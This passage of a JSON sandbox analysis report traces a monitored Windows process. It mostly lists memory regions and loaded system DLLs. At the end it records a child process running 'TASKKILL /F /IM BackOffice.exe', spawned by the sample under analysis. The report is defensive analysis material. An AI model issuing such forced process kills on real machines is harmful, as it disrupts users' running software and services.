"start_va": 1958019072, "timestamp": "00:01:20.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2125", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:20.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2126", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:20.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2127", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:20.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2128", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:20.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2129", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:20.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2130", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:20.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2131", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:20.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2132", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:20.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2133", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:20.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2134", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:20.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2135", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:20.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2136", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:20.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2137", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:20.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2138", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:20.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2139", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:20.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2140", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:20.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2141", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:20.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2142", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:20.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2143", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:20.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2144", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:20.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 8683519, "entry_point": 0, "filename": null, "id": "region_2145", "name": "pagefile_0x00000000006c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7077888, "timestamp": "00:01:20.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2146", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:20.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2147", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:20.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2148", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:20.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_2149", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:20.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2150", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:20.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_2151", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:20.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_2152", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:20.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_2153", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:20.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 3014656, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2154", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3014656, "timestamp": "00:01:20.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_2155", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:20.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_2156", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:20.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 10751999, "entry_point": 0, "filename": null, "id": "region_2157", "name": "pagefile_0x00000000008c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9175040, "timestamp": "00:01:20.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10813440, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_2158", "name": "pagefile_0x0000000000a50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10813440, "timestamp": "00:01:20.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33226752, "type": "region", "version": 1 }, "end_va": 33488895, "entry_point": 0, "filename": null, "id": "region_2159", "name": "private_0x0000000001fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33226752, "timestamp": "00:01:20.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2160", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:20.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2161", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:20.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_2162", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:20.688", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1787953152, "type": "region", "version": 1 }, "end_va": 1788329983, "entry_point": 1788095304, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2163", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1787953152, "timestamp": "00:01:20.688", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1788346368, "type": "region", "version": 1 }, "end_va": 1788387327, "entry_point": 1788351642, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2164", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1788346368, "timestamp": "00:01:20.688", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_2165", "name": "private_0x0000000001e50000", "norm_filename": null, "region_type": "private_memory", "start_va": 31784960, "timestamp": "00:01:20.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 35127295, "entry_point": 0, "filename": null, "id": "region_2166", "name": "private_0x0000000002140000", "norm_filename": null, "region_type": "private_memory", "start_va": 34865152, "timestamp": "00:01:20.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787924479, "entry_point": 1787783961, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2167", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:20.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2359295, "entry_point": 0, "filename": null, "id": "region_2168", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:20.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_2169", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:01:20.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 38072319, "entry_point": 35127296, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2170", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35127296, "timestamp": "00:01:20.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2171", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:20.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2172", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:20.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2173", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:20.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2174", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:20.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_2175", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:20.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_2176", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:01:20.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33816575, "entry_point": 0, "filename": null, "id": "region_2177", "name": "private_0x0000000002000000", "norm_filename": null, "region_type": "private_memory", "start_va": 33554432, "timestamp": "00:01:20.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38338560, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_2178", "name": "private_0x0000000002490000", "norm_filename": null, "region_type": "private_memory", "start_va": 38338560, "timestamp": "00:01:20.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787699616, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2179", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:20.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2180", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:20.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2181", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:20.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1786404863, "entry_point": 1785919673, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2182", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:20.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1787559936, "type": "region", "version": 1 }, "end_va": 1787658239, "entry_point": 1787564853, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2183", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1787559936, "timestamp": "00:01:20.782", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM BackOffice.exe /IM BackOffice.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_14", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 14, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", 